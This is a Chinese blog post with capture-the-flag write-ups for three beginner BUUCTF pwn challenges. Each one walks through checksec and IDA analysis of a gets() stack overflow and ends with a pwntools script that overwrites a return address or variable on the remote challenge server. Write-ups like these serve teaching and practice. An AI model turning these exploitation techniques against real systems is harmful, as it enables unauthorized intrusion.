BUUCTF PWN(1)

最新推荐文章于 2024-03-27 16:20:09 发布
最新推荐文章于 2024-03-27 16:20:09 发布
阅读量992 收藏 1
点赞数
分类专栏: PWN 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60794823/article/details/127077524
版权

rip

image
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅
image
首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址0X401186
image
查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小
点开s查看s的内存大小发现距离返回地址为0XF+0X8
image
构造payload:‘a’ * 0x23 + p64(0x401186)
发现连接超时image
这道题的s应该是一个局部变量,23个刚刚覆盖了rbp,然后那两个地址紧接着往下排,0x401198是 “retn” 保证程序能正常返回,然后0x401186在Main函数栈顶。又因为retn相当于pop + 执行,故形成了返回地址劫持~~
解决办法:payload=‘a’ * 23+ p64(0x401198) + p64(0x401186) #0x401198为返回地址
exp:

from pwn import * 

p = remote("node4.buuoj.cn",28191) 

payload = 'a' * 23 + p64(0x401198) + p64(0x401186) 

p.sendline(payload) 

p.interactive()

image
得到shell权限最后查看flag得到flag
image

warmup_csaw_2016

同样使用checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅
image
shift+f12查看字串发现查看flag的函数
image
跟进找到cat flag的函数返回地址0x40060D
image
打开main函数发现又是简单的栈溢出问题,找到溢出漏洞gets,没有对v5的输入做出限制
image
点击查看v5的内存,发现填充40字节的数据加上因为是64位文件加上8字节返回地址
image
构建payload:‘a’ * 0x48 + p64(0x40060D),构建exp

from pwn import * 

p = remote("node4.buuoj.cn",27321) 

payload = 'a' * 0x48 + p64(0x40060D) 

p.sendline(payload) 

p.interactive()

得到flag
image

ciscn_2019_n_1

用checksec扫描发现,这次打开了NX保护,同样是64位amd文件用ida打开
image
找到main函数打开发现,func()函数可以利用。
image
发现,即v2=11.28125时得到flag
image
可以看到栈溢出函数gets控制的是v1的输出,观察v2距离v1多少个字节。使v1溢出给v2填充为11.28125即可得到flag
接下来查看v1距离v2多少字节
image
由图可以看出v1距离v2为0x30-0x4这时填充一个11.28125即可得到flag
但是11.28125是十进制的数,要变为十六进制才能成功获取flag如何得到十六进制的浮点数呢?
image
找到汇编代码中比较浮点数的地方光标悬停在上面可以看到浮点数的十六进制,ok现在构造payload:‘a’ * (0x30-0x4) + p64(0x41348000),编写exp:

from pwn import * 

p = remote("node4.buuoj.cn",29740) 

payload = 'a' * (0x30-0x4) + p64(0x41348000) 

p.sendline(payload) 

p.interactive()

执行exp,得到flag
image

长不高的李肥肥
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF PWN方向 1-6 详解wp
qq_62564422的博客
02-06 1303
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF之路-pwn1_sctf_20161
qq_30528603的博客
05-27 407
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
buuctfpwn1_sctf_2016
最新发布
weixin_54452942的博客
03-27 610
简单易懂~
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1022
buuctf pwn
buuctf pwn入门1
weixin_63231007的博客
07-07 1031
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1432
buuctfpwnpwn1_sctf_2016(细致分析)
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
pwn1 一道pwn练习
05-07
pwn练习
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
CTFpwn入门学习01
2301_79880074的博客
01-26 1661
寒假学习计划第一轮,通过四道典型回顾复习。
buuctf pwn(1)
清霂的博客
01-30 1027
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF PWN部分目wp
awxnutpgs545144602的博客
08-16 1998
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
BUUCTF PWN记录 (未完待续)
qq_41071646的博客
08-01 1974
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一 连上就有flag的pwn 直接 运行就有权限,。 第二 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
buuctf pwn wp(第一波)无脑AAAA系列
月阴荒的博客
03-20 997
这里是一个总的分类,一个类型的第一目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的目我再讲原理。) 这一波都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类。 另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来做的...
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2005
经典栈溢出漏洞。
BUUCTF - PWNpwn1_sctf_2016
古月浪子的博客
03-19 4189
checksec一下 找到漏洞函数,s的长度为0x3c,而我们只能输入32个字符,不足以栈溢出,但是发现replace函数会把输入的 I 替换成 you,这样的话输入20个 I 就能填满s 找到后门函数 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.lo...
[BUUCTF]PWN4——pwn1_sctf_2016
mcmuyanga的博客
08-24 3437
[BUUCTF]4——pwn1_sctf_2016 目网址:https://buuoj.cn/challenges#pwn1_sctf_2016 步骤: 例行检查,32位,开启nx(堆栈不可执行)保护,就是说我们没法往堆栈上写东西 nc一下看看输入点的字符串 用32位ida打开附件,shift+f12查看一下程序里的字符串,看到了比较敏感的“cat flag.txt” 双击跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5将其反编译成我们熟悉的伪代码 看到这个函数的作用就是输出fla
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值